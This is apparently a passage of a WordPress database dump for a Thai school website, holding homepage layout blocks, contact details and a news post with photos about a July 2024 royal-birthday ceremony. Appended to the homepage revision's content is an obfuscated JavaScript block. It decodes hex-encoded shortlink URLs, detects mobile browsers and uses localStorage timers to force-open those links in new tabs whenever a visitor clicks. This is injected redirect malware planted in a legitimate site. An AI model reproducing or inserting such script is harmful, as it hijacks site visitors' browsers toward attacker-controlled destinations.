900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 22:53:17','2024-07-27 15:53:17','',14,'http://pakhaeng.ssk.in.th/?p=244',0,'revision','',0),
(245,1,'2024-07-28 23:06:27','2024-07-28 16:06:27','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>วันที่ 28 กรกฎาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ เข้าร่วมกิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาสพระราชพิธีมหามงคลเฉลิมพระชนมพรรษา 6 รอบ 28 กรกฎาคม 2567 ณ หอประชุมที่ว่าการอำเภอโนนคูณ อำเภอโนนคูณ จังหวัดศรีสะเกษ โดยได้ร่วมทำพิธีเจริญพระพุทธมนต์ ทำบุญตักบาตรถวายเป็นพระราชกุศล พิธีถวายสัตย์ปฏิญาณเพื่อเป็นข้าราชการที่ดีและพลังของแผ่นดินและพิธีลงนามถวายพระพร และพิธีถวายราชสักการะและจุดเทียนถวายพระพรชัยมงคล กิจกรรมในครั้งนี้ เพื่อน้อมรำลึกในพระมหากรุณาธิคุณ และแสดงความจงรักภักดีต่อสถาบันชาติ ศาสนา และพระมหากษัตริย์ อีกทั้งเพื่อเสริมสร้างความรักความสามัคคีแก่ปวงชนชาวไทยที่มีสถาบันพระมหากษัตริย์เป็นศูนย์รวมใจอีกด้วย</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":248,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154842.jpg\" alt=\"\" class=\"wp-image-248\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":249,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154845-1024x682.jpg\" alt=\"\" class=\"wp-image-249\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":251,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154847-1024x682.jpg\" alt=\"\" class=\"wp-image-251\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":246,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154849-1024x682.jpg\" alt=\"\" class=\"wp-image-246\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":247,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154850-1024x682.jpg\" alt=\"\" class=\"wp-image-247\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":250,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154855-713x1024.jpg\" alt=\"\" class=\"wp-image-250\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":253,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1578485-1024x578.jpg\" alt=\"\" class=\"wp-image-253\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":252,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1578490-578x1024.jpg\" alt=\"\" class=\"wp-image-252\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":254,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794195-1024x768.jpg\" alt=\"\" class=\"wp-image-254\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":255,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794198-1024x768.jpg\" alt=\"\" class=\"wp-image-255\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":256,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794204-1024x768.jpg\" alt=\"\" class=\"wp-image-256\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":257,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794210-1024x768.jpg\" alt=\"\" class=\"wp-image-257\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":258,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img 